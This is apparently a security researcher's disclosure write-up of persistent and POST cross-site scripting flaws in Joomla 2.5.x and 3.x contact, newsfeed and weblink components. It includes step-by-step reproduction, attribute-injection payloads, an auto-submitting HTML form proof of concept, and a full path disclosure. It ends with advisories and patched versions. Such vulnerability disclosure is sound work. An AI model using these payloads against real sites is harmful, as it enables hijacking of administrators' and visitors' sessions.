Last October 2013 I found some XSS vulnerabilities in Joomla! 3.1.2. Anyhow the affected versions were Joomla! version 2.5.14 and earlier 2.5.x versions and version 3.1.5 and earlier 3.0.x
versions. Actually all these XSS vulnerabilities existed on fields where we can insert links starting with http://. I first did a simple fuzz to test the output.

<foo> </bar> '" > <> ; () //

What I noticed was that it does filter out tags but still we can take advantage of these non-filtered characters. Of course we can use event handlers in JavaScript to trigger XSS.

‘; ()//"


Persistent XSS in com_contact

To reproduce this issue follow these steps.

• Click components -> Contacts-> Contacts. This is the URL: http://localhost/Joomla_3.1.5/administrator/index.php?option=com_contact
• Edit an existing contact or create a new contact.
• If you created a new contact Give a proper name and click on contact details.
• Inject this payload http://"onmouseover=alert(document.documentURI);" and click on Save.
• Move your mouse over the website field and you should get an alert box with the URI.

The website field is not properly sanitized and therefore it leads to a persistent XSS vulnerability. This can be used for attacking other users in the admin panel.

Infecting all viewers of the Website

That XSS is persistent and can be harmed only to the users inside the admin panel. To leverage this attack, why not make a new Contact page with our payload? 🙂

• Go to Menu -> Main Menu -> Add New Menu Item -> New
• Click on the Select button -> Contacts -> Single Contact.
• The page will reload with a new field named Select Contact. Click Select and click on the newly created contact with our payload stored.
• Give a Menu Title and save it.

Now if you navigate to your index page a new menu item should have appeared with the name you have given. Click on it and payload should be executed. In my case I have given an event handler move the mouse over the URL and the payload should be executed.

If you like to view the payload in the back end database it is stored in the contact_details table. In my database the query would be:

[code language=”sql”]
select id, name, webpage from alias_contact_details where id=2;
[/code]

POC Video

Persistent XSS in com_newsfeeds

To reproduce this XSS follow the steps.

• Click Components -> Newsfeeds -> Feeds. The URL:
• http://localhost/Joomla_3.1.5/administrator/index.php?option=com_newsfeeds
• Create a new feed or edit an existing feed.
• Give a Title if you created a new Feed.
• Inject this basic payload in the Link field: http://"onmouseover=alert(document.documentURI);"

Move your mouse over the Link field and you should get an alert box with the URI.

The payload is stored in the newsfeeds table in the database. In my configuration to retrieve it the query would be:

[code language=”sql”]
select id, name, link from alias_newsfeeds where id=1;
[/code]

POC Video

Bonus FPD

If you try to create a new Menu item for Newsfeeds like we did before for the Contacts you would get a PHP syntax error revealing the full path. The reason is because this component tries to retrieve the feeds by our given malformed URL. As it is not a valid URL it will return an error.

• Go to Menu -> Main Menu -> Add New Menu Item -> New
• Click on the Select button -> Newsfeeds -> Single Newsfeed.
• The page will reload with a new field named Select Feed. Click Select and click on the newly created Newsfeed with our payload stored.
• Give a Menu Title and save it.

Once you go to the index page and click on the created menu item you should see the full path disclosure.

Persistent XSS in com_weblinks

• Click Components -> Weblinks -> Links. The URL:
• http://localhost/Joomla_3.1.5/administrator/index.php?option=com_weblinks
• Create a new link or edit an existing link.
• Give a Title if you created a new link.
• Inject this basic payload in the URL field:   http://"onmouseover=alert(document.documentURI);"

Move your mouse over the URL field and you should get an alert box with the URI.

The XSS is stored in the weblinks table in the database. In my database the query would be

[code language=”sql”]
select id, title, url from alias_weblinks where id=1;[/code]

POC Video

POST XSS in com_contact

Com_contact also suffers from a POST XSS vulnerability. This can’t be remotely exploited because Joomla uses a CSRF token in the form.  The E-Mail field is not sanitized hence accepts any kind of input. You can basically inject HTML and JS.

For example if we inject "><svg/onload="alert('XSS by Osanda');" in the E-Mail field and this will return an alert box.

I also noticed that even if we reload the page or open the URL in a new tab the payload is executed. Our payload lies in the source code as follows.

POC

[code language=”html”]

<html>
<!– POST XSS in com_contact POC by @OsandaMalith –>
<body>
<form name="exploit" action="http://localhost/Joomla_3.1.5/index.php/contact" method="POST">
<input type="hidden" name="jform[contact_name]" value="test" />
<input type="hidden" name="jform[contact_email]" value="&quot;&gt;&lt;svg/onload=&quot;alert(&apos;XSS by Osanda&apos;);&quot;" />
<input type="hidden" name="jform[contact_subject]" value="test" />
<input type="hidden" name="jform[contact_message]" value="test" />
<input type="hidden" name="option" value="com_contact" />
<input type="hidden" name="task" value="contact.submit" />
<input type="hidden" name="return" value="" />
<input type="hidden" name="id" value="1:test" />
<input type="hidden" name="2b974e233b1ab7a34b82d352f3030e0a" value="1" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
[/code]

Joomla.org was also affected by this issue.

POC Video

Impact

Actually all these bugs are less critical but in a scenario where the website is hosted in a shared server an attacker gains access to website A which is a normal vulnerable website. After that via symlinking or gaining root he can break down into the admin panel of the website B which is a Joomla website as he can get the config file. So he can take advantage of these XSS vulnerabilities to compromise the staff users including the Admin and the common visitors.

Report Timeline and Advisories

Joomla Advisories
[1] http://developer.joomla.org/security/news/570-20131101-core-xss-vulnerability
[2] http://developer.joomla.org/security/news/571-20131102-core-xss-vulnerability
[3] http://developer.joomla.org/security/news/572-20131103-core-xss-vulnerability

Secunia Advisory
[1] http://secunia.com/advisories/55573/

All these issues are fixed in Joomla 3.2.0 stable and Joomla 2.5.15
[1] http://www.joomla.org/announcements/release-news/5516-joomla-3-2-0-stable-released.html
[2] http://www.joomla.org/announcements/release-news/5517-joomla-2-5-15-released.html

After a responsible disclosure done to Joomla These issues were resolved. Special thanks to Elin Waring from the Joomla Strike Team and Dulsara Premalal for supporting me with the emails for reporting.